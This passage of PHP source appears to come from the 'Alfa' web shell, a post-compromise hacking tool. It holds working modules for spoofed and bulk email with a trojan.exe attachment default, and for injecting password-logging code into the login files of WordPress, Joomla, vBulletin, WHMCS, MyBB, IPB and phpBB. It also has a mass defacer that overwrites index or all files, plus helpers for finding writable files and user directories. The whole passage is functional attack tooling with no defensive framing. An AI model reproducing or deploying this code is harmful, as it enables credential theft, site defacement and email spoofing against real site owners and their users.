  5643. echo "<b><font color=\"#FFFFFF\">[+] Founded ".$x." readable ".str_replace("{user}", "*", $makepwd)." directories\n"."<br /></font></b>";
  5644. echo "<b><font color=\"#FF0000\">[~] Searching for passwords in config files...\n\n"."<br /><br /><br /></font></b>";
  5645. foreach($users as $user){
  5646. if(empty($user))continue;
  5647. $path = str_replace("{user}", $user, $makepwd);
  5648. echo "<form method=post onsubmit='g(\"FilesMan\",this.c.value,\"\");return false;'><span><font color=#27979B>Change Dir <font color=#FFFF01>..:: </font><font color=red><b>$user</b></font><font color=#FFFF01> ::..</font></font></span><br><input class='foottable' type=text name=c value='$path'><input type=submit value='>>'></form><br>";
  5649. }
  5650. }else{echo('<b> <center><font color="#FFFFFF">[-] Error : coudn`t read /etc/passwd [-]</font></center></b>');}
  5651. echo '<br><br></b>';
  5652. echo '</div>';
  5653. alfafooter();
  5654. }
  5655. function alfamail(){
  5656. alfahead();
  5657. echo '<div class=header>';
  5658. AlfaNum(8,9,10);
  5659. echo '<center><p><div class="txtfont_header">| Fake Mail |</div></p><form action="" method="post" onsubmit="g(\'mail\',null,this.mail_to.value,this.mail_from.value,this.mail_subject.value,\'>>\',this.mail_content.value,this.count_mail.value,this.mail_attach.value); return false;">';
  5660. $table = array(
  5661. 'td1' => array('color' => 'FFFFFF', 'tdName' => 'Mail To : ', 'inputName' => 'mail_to', 'inputValue' => 'target@fbi.gov', 'inputSize' => '60','placeholder' => true),
  5662. 'td2' => array('color' => 'FFFFFF', 'tdName' => 'From : ', 'inputName' => 'mail_from', 'inputValue' => 'sec@google.com', 'inputSize' => '60', 'placeholder' => true),
  5663. 'td3' => array('color' => 'FFFFFF', 'tdName' => 'Subject : ', 'inputName' => 'mail_subject', 'inputValue' => 'your site hacked by me', 'inputSize' => '60'),
  5664. 'td4' => array('color' => 'FFFFFF', 'tdName' => 'Attach File : ', 'inputName' => 'mail_attach', 'inputValue' => $GLOBALS['cwd'].'trojan.exe', 'inputSize' => '60'),
  5665. 'td5' => array('color' => 'FFFFFF', 'tdName' => 'Count Mail : ', 'inputName' => 'count_mail', 'inputValue' => '1', 'inputSize' => '60')
  5666. );
  5667. create_table($table);
  5668. echo '<p><div class="txtfont">Message:</div></p><textarea rows="6" cols="60" name="mail_content">Hi Dear Admin :)</textarea><p><input type="submit" value=" " name="mail_send" /></p></form></center>';
  5669. if(isset($_POST['alfa4'])&&($_POST['alfa4'] == '>>')){
  5670. $mail_to = $_POST['alfa1'];
  5671. $mail_from = $_POST['alfa2'];
  5672. $mail_subject = $_POST['alfa3'];
  5673. $mail_content = $_POST['alfa5'];
  5674. $count_mail = (int)$_POST['alfa6'];
  5675. $mail_attach = $_POST['alfa7'];
  5676. if(filter_var($mail_to, FILTER_VALIDATE_EMAIL)){
  5677. if(!empty($mail_attach)&&@is_file($mail_attach)){
  5678. $file = $mail_attach;
  5679. $content = __read_file($file);
  5680. $content = chunk_split(__ZW5jb2Rlcg($content));
  5681. $uid = md5(uniqid(time()));
  5682. $filename = basename($file);
  5683. $headers  = "From: ".$mail_from." <".$mail_from.">\r\n";
  5684. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
  5685. $headers .= "Reply-To: ".$mail_from."\r\n";
  5686. $headers .= "Content-Type: multipart/mixed; boundary=\"".$uid."\"\r\n\r\n";
  5687. $headers .= 'MIME-Version: 1.0' . "\r\n";
  5688. $headers .= 'X-Mailer: php' . "\r\n";
  5689. $mail_content  = "--".$uid."\r\n";
  5690. $mail_content .= "Content-type:text/plain; charset=iso-8859-1\r\n";
  5691. $mail_content .= "Content-Transfer-Encoding: 7bit\r\n\r\n";
  5692. $mail_content .= $mail_content."\r\n\r\n";
  5693. $mail_content .= "--".$uid."\r\n";
  5694. $mail_content .= "Content-Type: application/octet-stream; name=\"".$filename."\"\r\n";
  5695. $mail_content .= "Content-Transfer-Encoding: base64\r\n";
  5696. $mail_content .= "Content-Disposition: attachment; filename=\"".$filename."\"\r\n\r\n";
  5697. $mail_content .= $content."\r\n\r\n";
  5698. $mail_content .= "--".$uid."--";
  5699. }else{
  5700. $headers  = "From: " . $mail_from. " ( ".$mail_from." ) \r\n";
  5701. $headers .= "To: " . $mail_to. " ( ".$mail_to." ) \r\n";
  5702. $headers .= 'Reply-To: '.$mail_from.'' . "\r\n";
  5703. $headers .= 'Content-type: text/html; charset=utf-8' . "\r\n";
  5704. $headers .= 'MIME-Version: 1.0' . "\r\n";
  5705. $headers .= 'X-Mailer: php' . "\r\n";
  5706. }
  5707. if(empty($count_mail)||$count_mail<1)$count_mail=1;
  5708. if(!empty($mail_from)){echo __pre();
  5709. for($i=1;$i<=$count_mail;$i++){
  5710. if(@mail($mail_to,$mail_subject,$mail_content,$headers))echo("<center>Sent -> $mail_to<br></center>");
  5711. }}else{__alert("Invalid Mail From !");}
  5712. }else{__alert("Invalid Mail To !");}
  5713. }
  5714. echo('</div>');
  5715. alfafooter();
  5716. }
  5717. function alfaziper(){
  5718. alfahead();
  5719. AlfaNum(8,9,10);
  5720. echo '<div class=header><p><center><p><div class="txtfont_header">| Compressor |</div></p>
  5721. <form onSubmit="g(\'ziper\',null,null,null,this.dirzip.value,this.zipfile.value,\'>>\');return false;" method="post">
  5722. <div class="txtfont">Dir/File: </div> <input type="text" name="dirzip" value="'.htmlspecialchars($GLOBALS['cwd']).'" size="60"/>
  5723. <div class="txtfont">Save Dir: </div> <input type="text" name="zipfile" value="'.$GLOBALS['cwd'].'alfa.zip" size="60"/>
  5724. <input type="submit" value=" " name="ziper" />
  5725. </form></center></p>';
  5726. if(isset($_POST['alfa5']) && ($_POST['alfa5'] == '>>')){
  5727. $dirzip = $_POST['alfa3'];
  5728. $zipfile = $_POST['alfa4'];
  5729. if (class_exists('ZipArchive')&&($GLOBALS['sys']!='unix'||!_alfa_can_runCommand(true,true))){
  5730. $code='if(!extension_loaded(\'zip\')||!file_exists($source)){return false;}$zip=new ZipArchive();if(!$zip->open($destination,ZIPARCHIVE::CREATE)){return false;}$source=str_replace(\'\\\\\',\'/\',realpath($source));if(is_dir($source)===true){$files=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($source),RecursiveIteratorIterator::SELF_FIRST);foreach($files as $file){$file=str_replace(\'\\\\\',\'/\',$file);if(in_array(substr($file,strrpos($file,\'/\')+1),array(\'.\',\'..\')))continue;$file=realpath($file);if(is_dir($file)===true){$zip->addEmptyDir(str_replace($source.\'/\',\'\',$file.\'/\'));}else if(is_file($file)===true){$zip->addFromString(str_replace($source.\'/\',\'\',$file),file_get_contents($file));}}}else if(is_file($source)===true){$zip->addFromString(basename($source),file_get_contents($source));}return $zip->close();';
  5731. $newfunc = create_function('$source,$destination', $code);
  5732. if($newfunc($dirzip, $zipfile)){
  5733. echo __pre().'<center><p><font color="green">Success...!<br>'.$zipfile.'</font></p></center>';
  5734. }else{echo __pre().'<center><p><font color="red">ERROR!!!...</font></p></center>';}
  5735. }else{
  5736. alfaEx("cd '".addslashes(dirname($zipfile))."';zip -r '".addslashes(basename($zipfile))."' '".addslashes($dirzip)."' > /dev/null &");
  5737. echo __pre().'<center><p>Please Wait For 1 minutes AND Check this -> <b><font color="green">'.$zipfile.'</font></b><br>Because We Executed The Command in The background !</p></center>';
  5738. }}
  5739. echo '</div>';
  5740. alfafooter();
  5741. }
  5742. function alfacmshijacker(){
  5743. alfahead();
  5744. AlfaNum(5,6,7,8,9,10);
  5745. echo '<div class=header><br>
  5746. <center><div class="txtfont_header">| Cms Hijacker |</div><br><br><form onSubmit="g(\'cmshijacker\',null,this.cmshi.value,this.saveto.value,\'>>\',this.cmspath.value);return false;" method=\'post\'>
  5747. <div class="txtfont">CMS: <select style="width:100px;" name="cmshi">';
  5748. $cm_array = array("vb"=>"vBulletin","wp"=>"wordpress","jom"=>"joomla","whmcs"=>"whmcs","mybb"=>"mybb","ipb"=>"ipboard","phpbb"=>"phpbb");
  5749. foreach($cm_array as $key=>$val)echo '<option value="'.$key.'">'.$val.'</option>';
  5750. echo("</select>");
  5751. echo ' Path installed cms: <input size="50" type="text" name="cmspath" placeholder="ex: /home/user/public_html/vbulletin/">
  5752. SaveTo: <input size="50" type="text" name="saveto" value="'.$GLOBALS['cwd'].'alfa.txt"></font>
  5753. <input type="submit" name="btn" value=" "></form></center><br>';
  5754. $cms = $_POST['alfa1'];
  5755. $saveto = $_POST['alfa2'];
  5756. $cmspath = $_POST['alfa4'];
  5757. if(!empty($cms) AND !empty($saveto) AND $_POST['alfa4'] AND $_POST['alfa3'] == '>>'){
  5758. echo __pre();
  5759. alfaHijackCms($cms,$cmspath,$saveto);
  5760. }
  5761. echo '</div>';
  5762. alfafooter();
  5763. }
  5764. function alfaHijackCms($cms,$cmspath,$saveto){
  5765. switch($cms){
  5766. case "vb":
  5767. hijackvBulletin($cmspath,$saveto);
  5768. break;
  5769. case "wp":
  5770. hijackwp($cmspath,$saveto);
  5771. break;
  5772. case "jom":
  5773. hijackJoomla($cmspath,$saveto);
  5774. break;
  5775. case "whmcs":
  5776. hijackWhmcs($cmspath,$saveto);
  5777. break;
  5778. case "mybb":
  5779. hijackMybb($cmspath,$saveto);
  5780. break;
  5781. case "ipb":
  5782. hijackIPB($cmspath,$saveto);
  5783. break;
  5784. case "phpbb":
  5785. hijackPHPBB($cmspath,$saveto);
  5786. break;
  5787. default:
  5788. echo "error!";
  5789. break;
  5790. }
  5791. }
  5792. function hijackvBulletin($path,$saveto){
  5793. $code='$alfa_username = strtolower($vbulletin->GPC["vb_login_username"]);$alfa_password = $vbulletin->GPC["vb_login_password"];$alfa_file = "{saveto_path}";$sql_query = $db->query_read("SELECT * FROM " . TABLE_PREFIX . "user WHERE `username`=\'" . $alfa_username . "\'");while($row = $db->fetch_array($sql_query)){if(strlen($alfa_password) > 1 AND strlen($alfa_username) > 1){$fp1 = @fopen($alfa_file, "a+");@fwrite($fp1, $alfa_username . \' : \' .  $alfa_password." (" . $row["email"] . ")\n");@fclose($fp1); $f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
  5794. $clearpw = 'defined(\'DISABLE_PASSWORD_CLEARING\')';
  5795. $code=str_replace('{saveto_path}',$saveto,$code);
  5796. $login = $path."/login.php";
  5797. $class = $path."/includes/class_bootstrap.php";
  5798. $dologin = 'do_login_redirect();';
  5799. $evil_login = "\t".$code."\n\t".$dologin;
  5800. $evil_class = "true";
  5801. if(@is_file($login) AND @is_writable($login) AND @is_file($class) AND @is_writable($class)){
  5802. $data_login = @file_get_contents($login);
  5803. $data_class = @file_get_contents($class);
  5804. if(strstr($data_login, $dologin) AND strstr($data_class, $clearpw)){
  5805. $login_replace = str_replace($dologin,$evil_login, $data_login);
  5806. $class_replace = str_replace($clearpw,$evil_class, $data_class);
  5807. @file_put_contents($login, $login_replace);
  5808. @file_put_contents($class, $class_replace);
  5809. hijackOutput(0,$saveto);
  5810. }else{
  5811. hijackOutput(1);
  5812. }
  5813. }else{
  5814. hijackOutput(1);
  5815. }
  5816. }
  5817. function hijackwp($path,$saveto){
  5818. $code = '$alfa_file="{saveto_path}";$fp = fopen($alfa_file, "a+");fwrite($fp, $_POST[\'log\']." : ".$_POST[\'pwd\']." (".($user->user_email).")\n");fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
  5819. $redirect_wp = 'if ( !is_wp_error($user) && !$reauth ) {';
  5820. $code=str_replace('{saveto_path}',$saveto,$code);
  5821. $login=$path."/wp-login.php";
  5822. $evil_login = "\t".$redirect_wp."\n\t".$code;
  5823. if(@is_file($login) AND @is_writable($login)){
  5824. $data_login = @file_get_contents($login);
  5825. if(strstr($data_login, $redirect_wp)){
  5826. $login_replace = str_replace($redirect_wp,$evil_login, $data_login);
  5827. @file_put_contents($login, $login_replace);
  5828. hijackOutput(0,$saveto);
  5829. }else{
  5830. hijackOutput(1);
  5831. }
  5832. }else{
  5833. hijackOutput(1);
  5834. }
  5835. }
  5836. function hijackJoomla($path,$saveto){
  5837. $code = '<?php jimport(\'joomla.user.authentication\');$Alfa_auth = & JAuthentication::getInstance();$Alfa_data = array(\'username\'=>$_POST[\'username\'],\'password\'=>$_POST[\'passwd\']);$Alfa_options = array();$Alfa_response = $Alfa_auth->authenticate($Alfa_data, $Alfa_options);if($Alfa_response->status == 1){$alfa_file="{saveto_path}";$fp=@fopen($alfa_file,"a+");@fwrite($fp, $Alfa_response->username.":".$_POST[\'passwd\']." ( ".$Alfa_response->email." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}?>';
  5838. $code=str_replace('{saveto_path}',$saveto,$code);
  5839. $comp=$path."/administrator/components/com_login/";
  5840. if(@is_file($comp."/login.php")){
  5841. $login = $comp."/login.php";
  5842. }elseif(@is_file($comp."/admin.login.php")){
  5843. $login = $comp."/admin.login.php";
  5844. }else{
  5845. $login = '';
  5846. }
  5847. if(@is_file($login) AND @is_writable($login) AND $login != ''){
  5848. $data_login = @file_get_contents($login);
  5849. $evil_login = $code."\n".$data_login;
  5850. @file_put_contents($login, $evil_login);
  5851. hijackOutput(0,$saveto);
  5852. }else{
  5853. hijackOutput(1);
  5854. }
  5855. }
  5856. function hijackWhmcs($path,$saveto){
  5857. $code = '<?php if(isset($_POST[\'username\']) AND isset($_POST[\'password\']) AND !empty($_POST[\'username\']) AND !empty($_POST[\'password\'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST[\'username\'];$alfa_pw = @$_POST[\'password\'];if(isset($_POST[\'language\'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = \'$alfa_uname\' AND `password` = \'".md5($alfa_pw)."\'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = \'$alfa_uname\'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(\':\', $row[\'password\']);$__encPW = md5($__salt[1].$_POST[\'password\']).\':\'.$__salt[1];if($row[\'password\'] == $__encPW){$allow = true;$row[\'username\'] = $row[\'email\'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row[\'username\'] . \' : \' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? \'is_admin\' : \'is_user\')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>';
  5858. $code=str_replace('{saveto_path}',$saveto,$code);
  5859. $conf=$path."/configuration.php";
  5860. if(@is_file($conf) AND @is_writable($conf)){
  5861. $data_conf = @file_get_contents($conf);
  5862. if(!strstr($data_conf,'?>'))$code = '?>'.$code;
  5863. $evil_conf = $data_conf."\n".$code;
  5864. @file_put_contents($conf, $evil_conf);
  5865. hijackOutput(0,$saveto);
  5866. }else{
  5867. hijackOutput(1);
  5868. }
  5869. }
  5870. function hijackMybb($path,$saveto){
  5871. $code = '$alfa_q = $db->query("SELECT `email` FROM ".TABLE_PREFIX."users WHERE `username` = \'".$user[\'username\']."\'");$alfa_fetch = $db->fetch_array($alfa_q);$alfa_file = "{saveto_path}";$fp = @fopen($alfa_file, "a+");@fwrite($fp, $user[\'username\']." : ". $user[\'password\']." ( ".$alfa_fetch[\'email\']." )\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);';
  5872. $find = '$loginhandler->complete_login();';
  5873. $code=str_replace('{saveto_path}',$saveto,$code);
  5874. $login=$path."/member.php";
  5875. $evil_login = "\t".$code."\n\t".$find;
  5876. if(@is_file($login) AND @is_writable($login)){
  5877. $data_login = @file_get_contents($login);
  5878. if(strstr($data_login, $find)){
  5879. $login_replace = str_replace($find,$evil_login, $data_login);
  5880. @file_put_contents($login, $login_replace);
  5881. hijackOutput(0,$saveto);
  5882. }else{
  5883. hijackOutput(1);
  5884. }
  5885. }else{
  5886. hijackOutput(1);
  5887. }
  5888. }
  5889. function hijackIPB($path,$saveto){
  5890. $code = '$Alfa_q = $this->DB->buildAndFetch(array(\'select\' => \'email\', \'from\' => \'members\', \'where\' => \'name="\'.$username.\'" OR email="\'.$email.\'"\'));$Alfa_file = "{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $_POST[\'ips_username\'].\' : \'.$_POST[\'ips_password\'].\' ( \'.$Alfa_q[\'email\'].\' )\'."\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);';
  5891. $find = 'unset( $member[\'plainPassword\'] );';
  5892. $code=str_replace('{saveto_path}',$saveto,$code);
  5893. $login=$path."/admin/sources/handlers/han_login.php";
  5894. $evil_login = "\t".$find."\n\t".$code;
  5895. if(@is_file($login) AND @is_writable($login)){
  5896. $data_login = @file_get_contents($login);
  5897. if(strstr($data_login, $find)){
  5898. $login_replace = str_replace($find,$evil_login, $data_login);
  5899. @file_put_contents($login, $login_replace);
  5900. hijackOutput(0,$saveto);
  5901. }else{
  5902. hijackOutput(1);
  5903. }
  5904. }else{
  5905. hijackOutput(1);
  5906. }
  5907. }
  5908. function hijackPHPBB($path,$saveto){
  5909. $code = '$Alfa_u = request_var(\'username\', \'\');$Alfa_p = request_var(\'password\', \'\');if($Alfa_u != \'\' AND $Alfa_p != \'\'){$Alfa_response = $auth->login($Alfa_u,$Alfa_p);if($Alfa_response[\'status\'] == LOGIN_SUCCESS){$Alfa_file ="{saveto_path}";$fp = @fopen($Alfa_file, "a+");@fwrite($fp, $Alfa_u." : ".$Alfa_p. " ( ".$Alfa_response[\'user_row\'][\'user_email\']." )\n");@fclose($fp);$f = @file($Alfa_file);$new = array_unique($f);$fp = @fopen($Alfa_file, "w");foreach($new as $values){@fputs($fp, $values);}@fclose($fp);}}';
  5910. $find = 'case \'login\':';
  5911. $code=str_replace('{saveto_path}',$saveto,$code);
  5912. $login=$path."/ucp.php";
  5913. $evil_login = "\t".$find."\n\t".$code;
  5914. if(@is_file($login) AND @is_writable($login)){
  5915. $data_login = @file_get_contents($login);
  5916. if(strstr($data_login, $find)){
  5917. $login_replace = str_replace($find,$evil_login, $data_login);
  5918. @file_put_contents($login, $login_replace);
  5919. hijackOutput(0,$saveto);
  5920. }else{
  5921. hijackOutput(1);
  5922. }
  5923. }else{
  5924. hijackOutput(1);
  5925. }
  5926. }
  5927. function hijackOutput($c=0,$p=''){echo($c==0?"<center><font color='green'>Success</font> --> path: $p</center>":'<center><font color="red">Error in inject code !</font></center>');}
  5928. function Alfa_StrSearcher($dir,$string,$ext,$e,$arr=array()){
  5929. if(@is_dir($dir)){
  5930. $files=@scandir($dir);
  5931. foreach($files as $key => $value){
  5932. $path=@realpath($dir. DIRECTORY_SEPARATOR .$value);
  5933. if(!@is_dir($path)){
  5934. if($ext!='*'){$f = basename($path);$f = explode('.',$f);$f = end($f);if($f!=$ext)continue;}
  5935. if($e=='str'){
  5936. $content = @file_get_contents($path);
  5937. if(strpos($content, $string) !== false){
  5938. echo str_replace('\\','/',$path) . "<br>";
  5939. }
  5940. }else{
  5941. if(strstr($value,$string)){
  5942. echo str_replace('\\','/',$path) . "<br>";
  5943. }
  5944. }
  5945. $results[] = $path;
  5946. }elseif($value != "." && $value != "..") {
  5947. Alfa_StrSearcher($path,$string,$ext,$e,$results);
  5948. $results[] = $path;
  5949. }}}}
  5950. function alfasearcher(){
  5951. alfahead();
  5952. echo '<div class=header><center><p><div class="txtfont_header">| Searcher |</div></p><h3><a href=javascript:void(0) onclick="g(\'searcher\',null,\'file\')">| Find Readable Or Writable Files | </a><a href=javascript:void(0) onclick="g(\'searcher\',null,\'str\')">| Find Files By Name | </a></h3></center>';
  5953. if(isset($_POST['alfa1'])&&$_POST['alfa1']=='file'){
  5954. echo '<center><div class="txtfont_header">| Find Readable Or Writable Files  |</div><br><br><form name="srch" onSubmit="g(\'searcher\',null,\'file\',this.filename.value,this.ext.value,this.method.value,\'>>\');return false;" method=\'post\'>
  5955. <div class="txtfont">
  5956. Method: <select style="width: 18%;" onclick="alfa_searcher_tool(this.value);" name="method"><option value="files">Find All Writable Files</option><option value="dirs">Find All Writable Dirs</option><option value="all">Find All Readable And Writable Files</option></select>
  5957. Dir: <input size="50" id="target" type="text" name="filename" value="'.$GLOBALS['cwd'].'">
  5958. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
  5959. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5960. $dir = $_POST['alfa2'];
  5961. $ext = $_POST['alfa3'];
  5962. $method = $_POST['alfa4'];
  5963. if($_POST['alfa5']=='>>'){
  5964. echo __pre();
  5965. if(substr($dir,-1)=='/')$dir=substr($dir,0,-1);
  5966. Alfa_Searcher($dir,trim($ext),$method);
  5967. }
  5968. }
  5969. if($_POST['alfa1']=='str'){
  5970. echo '<center><div class="txtfont_header">| Find Files By Name / Find String In Files |</div><br><br><form onSubmit="g(\'searcher\',null,\'str\',this.dir.value,this.string.value,\'>>\',this.ext.value,this.method.value);return false;" method=\'post\'>
  5971. <div class="txtfont">
  5972. Method: <select name="method"><option value="name">Find Files By Name</option><option value="str">Find String In Files</option></select>
  5973. String: <input type="text" name="string" value="">
  5974. Dir: <input size="50" type="text" name="dir" value="'.$GLOBALS['cwd'].'">
  5975. Ext: <small><font color="red">[ * = all Ext ]</font></small> <input id="ext" style="text-align:center;" type="text" name="ext" size="5" value="php">
  5976. <input type="submit" name="btn" value=" "></div></form></center><br>';
  5977. $dir = $_POST['alfa2'];
  5978. $string = $_POST['alfa3'];
  5979. $ext = $_POST['alfa5'];
  5980. if(!empty($string) AND !empty($dir) AND $_POST['alfa4'] == '>>'){
  5981. echo __pre();
  5982. Alfa_StrSearcher($dir,$string,$ext,$_POST['alfa6']);
  5983. }
  5984. }
  5985. echo '</div>';
  5986. alfafooter();
  5987. }
  5988. function alfaMassDefacer(){
  5989. alfahead();
  5990. AlfaNum(5,6,7,8,9,10);
  5991. echo "<div class=header><center><p><div class='txtfont_header'>| Mass Defacer |</div></p><form onSubmit=\"g('MassDefacer',null,this.massdir.value,this.defpage.value,this.method.value,'>>');return false;\" method='post'>";
  5992. echo '<div class="txtfont">Deface Method: <select name="method"><option value="index">Deface Index Dirs</option><option value="all">All Files</option></select>
  5993.     Mass dir: <input size="50" id="target" type="text" name="massdir" value="'.htmlspecialchars($GLOBALS['cwd']).'">
  5994.     DefPage: <input size="50" type="text" name="defpage" value="'.htmlspecialchars($GLOBALS['cwd']).'"></div> <input type="submit" name="btn" value=" "></center></p>
  5995. </form>';
  5996. $dir = $_POST['alfa1'];
  5997. $defpage = $_POST['alfa2'];
  5998. $method = $_POST['alfa3'];
  5999. $fCurrent = $GLOBALS['__file_path'];
  6000. if($_POST['alfa4'] == '>>'){
  6001. if(!empty($dir)){
  6002. if(@is_dir($dir)){
  6003. if(@is_readable($dir)){
  6004. if(@is_file($defpage)){
  6005. if($dh = @opendir($dir)){
  6006. echo __pre();
  6007. while (($file = @readdir($dh)) !== false){
  6008. if($file == '..' || $file == '.')continue;
  6009. $newfile=$dir.$file;
  6010. if($fCurrent == $newfile)continue;
  6011. if(@is_dir($newfile)){
  6012. Alfa_ReadDir($newfile,$method,$defpage);
  6013. }else{
  6014. if(!@is_writable($newfile))continue;
  6015. if(!@is_readable($newfile))continue;
  6016. Alfa_Rewriter($newfile,$file,$defpage,$method);
  6017. }
  6018. }
  6019. closedir($dh);
  6020. }else{__alert('<font color="red">Error In OpenDir...</font>');}
  6021. }else{__alert('<font color="red">DefPage File NotFound...</font>');}
  6022. }else{__alert('<font color="red">Directory is not Readable...</font>');}
  6023. }else{__alert('<font color="red">Mass Dir is Invalid Dir...</font>');}
  6024. }else{__alert('<font color="red">Dir is Empty...</font>');}
  6025. }
  6026. echo '</div>';
  6027. alfafooter();
  6028. }
  6029. function Alfa_ReadDir($dir,$method='',$defpage=''){
  6030. if(!@is_readable($dir)) return false;
  6031. if (@is_dir($dir)) {
  6032. if ($dh = @opendir($dir)) {
  6033. while(($file=readdir($dh))!==false) {
  6034. if($file == '..' || $file == '.')continue;
  6035. $newfile=$dir.'/'.$file;
  6036. if(@is_readable($newfile)&&@is_dir($newfile))Alfa_ReadDir($newfile,$method,$defpage);
  6037. if(@is_file($newfile)){
  6038. if(!@is_readable($newfile))continue;
  6039. Alfa_Rewriter($newfile,$file,$defpage,$method);
  6040. }
  6041. }
  6042. closedir($dh);
  6043. }
  6044. }
  6045. }
  6046. function Alfa_Rewriter($dir,$file,$defpage,$m='index'){
  6047. if(!@is_writable($dir)) return false;
  6048. if(!@is_readable($dir)) return false;
  6049. $defpage=@file_get_contents($defpage);
  6050. if($m == 'index'){
  6051. $indexs = array('index.php','index.htm','index.html','default.asp','default.aspx','index.asp','index.aspx','index.js');
  6052. if(in_array(strtolower($file),$indexs)){
  6053. @file_put_contents($dir,$defpage);
  6054. echo @is_file($dir)?$dir."<b><font color='red'>DeFaced...</b></font><br>" : '';
  6055. }
  6056. }elseif($m=='all'){
  6057. @file_put_contents($dir,$defpage);
  6058. echo @is_file($dir)?$dir."  <b><font color='red'>DeFaced...</b></font><br>" : '';
  6059. }
  6060. }
  6061. function alfaGetDisFunc(){
  6062. alfahead();
  6063. echo '<div class="header">';
  6064. $disfun = @ini_get('disable_functions');
  6065. $s = explode(',',$disfun);
  6066. $f = array_unique($s);
  6067. echo '<center><br><b><font color="#7CFC00">Disable Functions</font></b><pre><table border="1"><tr><td align="center" style="background-color: green;color: white;width:5%">#</td><td align="center" style="background-color: green;color: white;">Func Name</td></tr>';
  6068. $i=1;
  6069. foreach($f as $s){
  6070. $s=trim($s);
  6071. if(function_exists($s)||!is_callable($s))continue;
  6072. echo '<tr><td align="center" style="background-color: black;">'.$i.'</td>';
  6073. echo '<td align="center" style="background-color: black;"><a style="text-decoration: none;" target="_blank" href="http://php.net/manual/en/function.'.str_replace('_','-',$s).'.php"><span class="disable_functions"><b>'.$s.'</b></span></a></td>';
  6074. $i++;
  6075. }
  6076. echo '</table></center>';
  6077. echo '</div>';
  6078. alfafooter();
  6079. }
  6080. function Alfa_Create_A_Tag($action,$vals){
  6081. $nulls = array();
  6082. foreach($vals as $key => $val){
  6083. echo '<a href=javascript:void(0) onclick="g(\''.$action.'\',';
  6084. for($i=1;$i<=$val[1]-1;$i++)$nulls[] = 'null';
  6085. $f = implode(',',$nulls);
  6086. echo $f.',\''.$val[0].'\');return false;">| '.$key.' | </a>';
  6087. unset($nulls);
  6088. }
  6089. }
  6090. function Alfa_Searcher($dir, $ext, $method) {
  6091. if(@is_readable($dir)){
  6092. if($method == 'all')$ext = '*';
  6093. if($method == 'dirs')$ext = '*';
  6094. $globFiles = @glob("$dir/*.$ext");
  6095. $globDirs  = @glob("$dir/*", GLOB_ONLYDIR);
  6096. $blacklist = array();
  6097. foreach ($globDirs as $dir) {
  6098. if(!@is_readable($dir)) continue;
  6099. @Alfa_Searcher($dir, $ext, $method);
  6100. }
  6101. switch($method){
  6102. case "files":
  6103. foreach ($globFiles as $file){
  6104. if(@is_writable($file)){
  6105. echo "$file<br>";
  6106. }
  6107. }
  6108. break;
  6109. case "dirs":
  6110. foreach ($globFiles as $file){
  6111. if(@is_writable(dirname($file)) && !in_array(dirname($file), $blacklist)){
  6112. echo dirname($file).'<br>';
  6113. $blacklist[] = dirname($file);
  6114. }
  6115. }
  6116. break;
  6117. case "all":
  6118. foreach ($globFiles as $file){
  6119. echo $file.'<br>';
  6120. }
  6121. break;
  6122. }
  6123. unset($blacklist);
  6124. }
  6125. }
  6126. function AlfaiFrameCreator($f,$width='100%',$height='600px'){
  6127. return('<iframe src="'.$f.'" width="'.$width.'" height="'.$height.'" frameborder="0"></iframe>');
  6128. }
  6129. class AlfaCURL {
  6130. public $headers;
  6131. public $user_agent;
  6132. public $compression;
  6133. public $cookie_file;
  6134. public $proxy;
  6135. public $path;
  6136. public $ssl = false;
  6137. public $curl_status = true;
  6138. function __construct($cookies=false,$compression='gzip',$proxy=''){
  6139. if(!extension_loaded('curl')){$curl_status = false;return false;}
  6140. $this->headers[] = 'Accept: image/gif, image/x-bitmap, image/jpeg, image/pjpeg';
  6141. $this->headers[] = 'Connection: Keep-Alive';
  6142. $this->headers[] = 'Content-type: application/x-www-form-urlencoded;charset=UTF-8';
  6143. $this->user_agent = 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0)';
  6144. $this->path = ALFA_TEMPDIR.'/Alfa_cookies.txt';
  6145. $this->compression=$compression;
  6146. $this->proxy=$proxy;
  6147. $this->cookies=$cookies;
  6148. if($this->cookies)$this->cookie($this->path);
  6149. }
  6150. function cookie($cookie_file) {
  6151. if (_alfa_file_exists($cookie_file,false)) {
  6152. $this->cookie_file=$cookie_file;
  6153. }else{
  6154. @fopen($cookie_file,'w') or die($this->error('The cookie file could not be opened.'));
  6155. $this->cookie_file=$cookie_file;
  6156. @fclose($this->cookie_file);
  6157. }
  6158. }
  6159. function Send($url,$method="get",$data=""){
  6160. if(!$this->curl_status){return false;}
  6161. $process = curl_init($url);
  6162. curl_setopt($process, CURLOPT_HTTPHEADER, $this->headers);
  6163. curl_setopt($process, CURLOPT_HEADER, 0);
